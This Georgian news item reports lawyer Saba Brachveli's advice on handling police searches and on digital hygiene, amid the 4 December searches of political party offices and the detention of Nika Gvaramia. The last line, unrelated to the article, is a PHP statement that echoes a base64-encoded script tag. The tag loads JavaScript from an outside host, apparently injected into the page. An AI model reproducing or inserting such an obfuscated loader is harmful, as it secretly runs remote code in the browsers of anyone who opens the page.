celsiusi
ავერსი შნაიდერი

„ღია საზოგადოების ფონდის“ იურისტი საბა ბრაჭველი Facebook-ზე წერს რა უნდა გააკეთოს მოქალაქემ თუ მასთან პოლიცია მივიდა.

თუ სახლში მოგადგნენ და აკაკუნებენ, არ შეშინდეთ და დაპანიკდეთ, დარეკეთ ცხელ ხაზზე 577070563;
სანამ კარს გააღებთ, გადით ლაივში (გაქვთ ამის უფლება). ვიდეოს ლაივი ჯობია, რადგან ვერ წაგიშლიან;
არ დააწყებინოთ ჩხრეკა, სანამ ადვოკატი არ მოვა. რაღაც ეტაპზე კარის გაღებას მოგთხოვენ, მაგრამ ეცადეთ, ადვოკატისთვის დრო მოიგოთ;
შეგიძლიათ ასევე მოსთხოვოთ ჩხრეკის დადგენილების/განჩინების გაცნობა;
ჩხრეკის მიმდინარეობისას მაქსიმალურად ეცადეთ, არ დაუშვათ, რომ სხვადასხვა ოთახებში იბოდიალონ პოლიციელებმა (ლაივის გამოყენებით. თუ გაბოდიალდებიან, ეგ მაინც კარგი მტკიცებულება იქნება);
პირდაპირ არ გაუღოთ კარი ან საერთოდ არ გაუღოთ 'გაზის ინსპექტორს', რომელიც მოულოდნელად გეწვიათ, ან მეზობელს, რომელსაც ნიორი შემოაკლდა დილის 7 საათზე. იყავით ყურადღებით.
ციფრული ჰიგიენა:

წაშალეთ სიგნალის აპლიკაცია და ხელახლა გადმოწერეთ
სიგნალის გარეთ თუ ლაპარაკობთ სადმე, წაშალეთ
მობილურიდან ყველა მონაცემის წასაშლელად - factory reset
სამსახურის ლეპტოპები დატოვეთ სამსახურში, პირადი ლეპტოპები არ წაიღოთ ოფისებში
ვინც ოფისებში დადიხართ, ზედმეტი ნივთები მოაშორეთ ოფისებიდან. Clean desk policy.
და რაც მთავარია - იყავით მხნედ - პოლიციელები არიან დემენტორები და შიშს ყნოსავენ ხოლმე. ჩხრეკები ჯერ-ჯერობით სისხლის წესით დაკავებების გარეშე მიმდინარეობს", - წერს ბრაჭველი.

დღეს, 4 დეკემბერს, პოლიცია ჩხრეკს პოლიტიკური პარტიების ოფისებს, ძალის გამოყენებით დააკავეს ნიკა გვარამია და მისი პარტიის წევრი.

61
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");